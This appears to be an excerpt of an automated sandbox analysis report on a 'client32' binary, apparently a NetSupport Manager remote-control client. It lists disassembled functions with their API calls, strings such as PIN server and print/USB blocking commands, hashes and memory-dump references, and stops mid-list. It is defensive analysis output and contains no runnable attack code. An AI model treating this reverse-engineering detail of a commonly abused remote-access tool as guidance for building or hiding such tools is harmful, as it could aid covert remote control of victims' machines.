                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library_memmove$AddressFreeLoadProc_free_malloc_memset
                                                                                                                                        • String ID: GetAdaptersInfo$cbMacAddress == MAX_ADAPTER_ADDRESS_LENGTH$iphlpapi.dll$macaddr.cpp
                                                                                                                                        • API String ID: 3275914093-1155488092
                                                                                                                                        • Opcode ID: 8104237eca5a5221b94eeb4ca831f12d68e68daa6d9a10a983669790d78c9745
                                                                                                                                        • Instruction ID: 138a8a196c458c616918aa9a35acf883e974d0d6ed9fc09fc2d782cecd975f73
                                                                                                                                        • Opcode Fuzzy Hash: 8104237eca5a5221b94eeb4ca831f12d68e68daa6d9a10a983669790d78c9745
                                                                                                                                        • Instruction Fuzzy Hash: 6431A4B5E04218BBDB009EA89C84D9E777C9F85368F804568FE69E7340E731ED05C7A0
                                                                                                                                        Function 68901380 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 294COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • _memset.LIBCMT ref: 6890141D
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901678
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 689016C8
                                                                                                                                        • std::exception::exception.LIBCMT ref: 68901740
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 6890175B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection_memset$EnterException@8LeaveThrow_mallocstd::exception::exceptionwsprintf
                                                                                                                                        • String ID: END_REC$MORE$RESULT$b
                                                                                                                                        • API String ID: 285166177-3141901015
                                                                                                                                        • Opcode ID: c957f03b506fc944c41f36d90b23b66a6ca926217c31905926c0f89e44359e75
                                                                                                                                        • Instruction ID: 8e0d54fb250e766c6679a6c0aa1f0f963f7ef2e1088b31270231892459db8c66
                                                                                                                                        • Opcode Fuzzy Hash: c957f03b506fc944c41f36d90b23b66a6ca926217c31905926c0f89e44359e75
                                                                                                                                        • Instruction Fuzzy Hash: F0B164B5D052699FDF20DFE8DC80AEEB7B4BF55308F80056EE456A6200E7359A48CB52
                                                                                                                                        Function 1105B1B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 159windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 11141AB0: _memset.LIBCMT ref: 11141AF5
                                                                                                                                          • Part of subcall function 11141AB0: GetVersionExA.KERNEL32(?), ref: 11141B0E
                                                                                                                                          • Part of subcall function 11141AB0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
                                                                                                                                          • Part of subcall function 11141AB0: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
                                                                                                                                          • Part of subcall function 11141AB0: FreeLibrary.KERNEL32(00000000), ref: 11141B5F
                                                                                                                                          • Part of subcall function 11141AB0: GetSystemDefaultLangID.KERNEL32 ref: 11141B6A
                                                                                                                                        • CreateWindowExA.USER32(00000000,NSMCltReplayClass,?,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000), ref: 1105B226
                                                                                                                                        • IsWindowVisible.USER32(?), ref: 1105B298
                                                                                                                                        • UpdateWindow.USER32(00000000), ref: 1105B339
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 1105B2CD
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        • UpdateWindow.USER32(00000000), ref: 1105B363
                                                                                                                                          • Part of subcall function 110290F0: _strrchr.LIBCMT ref: 110291E5
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000003), ref: 1105B390
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ExitLibraryProcessUpdate$AddressCreateDefaultErrorFreeLangLastLoadMessageProcRectSystemVersionVisible_memset_strrchrwsprintf
                                                                                                                                        • String ID: CltReplay.cpp$NSMCltReplayClass$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_hWnd || !"CltReplayClass Window failed to create"
                                                                                                                                        • API String ID: 1774176861-1619494117
                                                                                                                                        • Opcode ID: 6bea5c09297829cbfb848c60cb5d7fef759d0651ead25e322a2e7de13e6ca9cc
                                                                                                                                        • Instruction ID: 79629effa54c5317598ac1fd62f88e21f554d2986a4eda5a7fee751a18d8bf94
                                                                                                                                        • Opcode Fuzzy Hash: 6bea5c09297829cbfb848c60cb5d7fef759d0651ead25e322a2e7de13e6ca9cc
                                                                                                                                        • Instruction Fuzzy Hash: D0518D74B00706ABD760DF64CC81FAAF3B9BF44708F108568EA56AB685DB30F944CB94
                                                                                                                                        Function 689101E0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 132threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • std::exception::exception.LIBCMT ref: 6891024A
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 6891025F
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 68910276
                                                                                                                                        • InitializeCriticalSection.KERNEL32(-0000000E), ref: 68910289
                                                                                                                                        • InitializeCriticalSection.KERNEL32(6893D004), ref: 68910298
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893D004), ref: 689102AC
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 689102D2
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893D004), ref: 6891035F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                        • String ID: 0/#v$QueueThreadEvent$Refcount.cpp
                                                                                                                                        • API String ID: 1976012330-2768430589
                                                                                                                                        • Opcode ID: 677f1b10091fd94332061f2b16abca3370edd4866483fe6ca2b5de8204f76fef
                                                                                                                                        • Instruction ID: 2dd53814fc0783dfda238ce1ead6ea93c6b40cbf9d0e17cd2dd7e677189e4e54
                                                                                                                                        • Opcode Fuzzy Hash: 677f1b10091fd94332061f2b16abca3370edd4866483fe6ca2b5de8204f76fef
                                                                                                                                        • Instruction Fuzzy Hash: 5941D271A4C628AFDB21DF698844A6EBBF4EB95708F80452EE446D7340E775D900CB51
                                                                                                                                        Function 1105D190 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 130windowregistryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegisterClassA.USER32(111E9674), ref: 1105D1F2
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        • CreateWindowExA.USER32(00000000,NSMCobrProxy,11190240,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1105D233
                                                                                                                                        • SetPropA.USER32(?,NSMCobrProxy,00000000), ref: 1105D2BD
                                                                                                                                        • GetMessageA.USER32(00000000,?,00000000,00000000), ref: 1105D2E0
                                                                                                                                        • TranslateMessage.USER32(?), ref: 1105D2F6
                                                                                                                                        • DispatchMessageA.USER32(?), ref: 1105D2FC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$ClassCreateDispatchErrorExitLastProcessPropRegisterTranslateWindowwsprintf
                                                                                                                                        • String ID: CobrowseProxy.cpp$CobrowseProxy::RunCobrowse$NSMCobrProxy$_bOK$m_hAppWin
                                                                                                                                        • API String ID: 13347155-1383313024
                                                                                                                                        • Opcode ID: 37c3c3e8957f14a7e3b355c897228082546cf523f8d38056e85fd5e1210056e5
                                                                                                                                        • Instruction ID: 0f733430d951bad01d0579ae861b00247f75b5e4436af6dec06e8f89504007ad
                                                                                                                                        • Opcode Fuzzy Hash: 37c3c3e8957f14a7e3b355c897228082546cf523f8d38056e85fd5e1210056e5
                                                                                                                                        • Instruction Fuzzy Hash: 3341F1B5E0074AABD761DFA5CC84F9FFBA5AB44758F10842AF91697280EA30E440CB61
                                                                                                                                        Function 6891ABF1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 106COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __getptd
                                                                                                                                        • String ID: MOC$RCC$csm$csm
                                                                                                                                        • API String ID: 3384420010-1441736206
                                                                                                                                        • Opcode ID: 2948d543296bb9c706df1e9ba1aa1137578febb3c3cc4c93cd90a746d2b5b3f7
                                                                                                                                        • Instruction ID: 542f676729ce44f9f88ad611f1f41fcf0cd1802a968163bbd2628d63870cdb0e
                                                                                                                                        • Opcode Fuzzy Hash: 2948d543296bb9c706df1e9ba1aa1137578febb3c3cc4c93cd90a746d2b5b3f7
                                                                                                                                        • Instruction Fuzzy Hash: 0C318B3990C60DCFCB208F68C88476977FDAF5020AFD4886AD8E9A7651D734DD48CA92
                                                                                                                                        Function 688FC390 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 102COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 688FC3C8
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 688FC412
                                                                                                                                        • _free.LIBCMT ref: 688FC458
                                                                                                                                        • _free.LIBCMT ref: 688FC48C
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                                                        • String ID: AT=%d$CAP=%s$DEP=%s$FMASK=%d$MAX=%d$ORO=%s$ORU=%s
                                                                                                                                        • API String ID: 3180605519-3721514808
                                                                                                                                        • Opcode ID: ecb70530f9a1dbe8477bcdf3867397a76e42590e6577ba608f2247b84be386ab
                                                                                                                                        • Instruction ID: 0cbb101c2c7ecc769b8c8df63c3f239febad2df0d5f3c854578bf9a81c85910c
                                                                                                                                        • Opcode Fuzzy Hash: ecb70530f9a1dbe8477bcdf3867397a76e42590e6577ba608f2247b84be386ab
                                                                                                                                        • Instruction Fuzzy Hash: 833170B554422D7BE7029E25CC40FBE736CAF61199F84C415F82857642EB35EA01C7F9
                                                                                                                                        Function 68909110 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 79libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 68909136
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 6890913D
                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000), ref: 68909153
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 68909171
                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 6890917B
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 6890918E
                                                                                                                                        • GetTokenInformation.ADVAPI32(00000000,0000000C(TokenIntegrityLevel),6893A2F0,00000004,?), ref: 689091AD
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 689091D4
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 689091DB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$Handle$CloseCurrentOpenToken$AddressInformationModuleProc
                                                                                                                                        • String ID: ProcessIdToSessionId$kernel32.dll
                                                                                                                                        • API String ID: 2536908267-3889420803
                                                                                                                                        • Opcode ID: da2a0e66ea8db21de5ac82b3e65a13ad68a67e68a3dc774ea07b786e1ad65c8b
                                                                                                                                        • Instruction ID: 25eb201f16473ec7aeae1e005ab17e941c2630c739210487a5f42254bb100145
                                                                                                                                        • Opcode Fuzzy Hash: da2a0e66ea8db21de5ac82b3e65a13ad68a67e68a3dc774ea07b786e1ad65c8b
                                                                                                                                        • Instruction Fuzzy Hash: 86215B75B08219EBEF709AA98C48F5E3BBCEB85B46F400059E914E3240EB70D900CAA0
                                                                                                                                        Function 68905DF0 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 248COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 68905E36
                                                                                                                                          • Part of subcall function 689033A0: wsprintfA.USER32 ref: 689034FD
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __vswprintf_memsetwsprintf
                                                                                                                                        • String ID: %02X%02X%02X%02X%02X%02X$0x0x0x0$305090$>???.???.???.???$CLIENT_NAME=%s$CMD=CLIENT_PIN_REQUEST$CMD=CONTROL_PIN_REQUEST$PINserver
                                                                                                                                        • API String ID: 518437271-2187247375
                                                                                                                                        • Opcode ID: 7fab664c67e13da83bff242005d49ada5329e0ff85e7ac64e3d2642d1941d85a
                                                                                                                                        • Instruction ID: 9615c638fb66ed67437abcee4755ee284c09a938971712574cd5579d564bab7a
                                                                                                                                        • Opcode Fuzzy Hash: 7fab664c67e13da83bff242005d49ada5329e0ff85e7ac64e3d2642d1941d85a
                                                                                                                                        • Instruction Fuzzy Hash: DE91A9B5C44268AFDB20DBA8CC40FFEB778EB55314F8046A9E519B7180E7359A84CB60
                                                                                                                                        Function 68907F80 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 154libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 68907F9F
                                                                                                                                        • LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,?,?,?,?,?,?,?,?,688FB916,?,00000100,00000006,00000001), ref: 68907FAC
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 68907FCB
                                                                                                                                        • _malloc.LIBCMT ref: 68907FFB
                                                                                                                                        • wsprintfA.USER32 ref: 6890807C
                                                                                                                                        • _free.LIBCMT ref: 68908110
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 6890811C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeLibrary$AddressErrorHeapLastLoadProc_free_malloc_memsetwsprintf
                                                                                                                                        • String ID: %02X%02X%02X%02X%02X%02X$GetAdaptersInfo$iphlpapi.dll
                                                                                                                                        • API String ID: 1404005415-834977148
                                                                                                                                        • Opcode ID: ea0d22c364b3d99d67f564162f2baae6a80feaf923827d63d4997d3edde86248
                                                                                                                                        • Instruction ID: d8c68585bfacf41e917ec023183692008a48e1de01aa79b7fa74dbdf97cf80c3
                                                                                                                                        • Opcode Fuzzy Hash: ea0d22c364b3d99d67f564162f2baae6a80feaf923827d63d4997d3edde86248
                                                                                                                                        • Instruction Fuzzy Hash: 2151E771B08209ABDF058FB88C94AEE7BFDEF49305F544169ED56AB241E731D904C760
                                                                                                                                        Function 1103D180 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 146COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1103D27F
                                                                                                                                        • IsA(), xrefs: 1103D284
                                                                                                                                        • BLOCKPRINTING, xrefs: 1103D23D
                                                                                                                                        • RESUMEPRINTINGPRINTER=*FILETYPES=, xrefs: 1103D262
                                                                                                                                        • BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1, xrefs: 1103D25B
                                                                                                                                        • SETUSBMASSSTORAGEACCESS, xrefs: 1103D1E3
                                                                                                                                        • SETOPTICALDRIVEACCESSACCESSMODES=%u, xrefs: 1103D22F
                                                                                                                                        • SETOPTICALDRIVEACCESS, xrefs: 1103D214
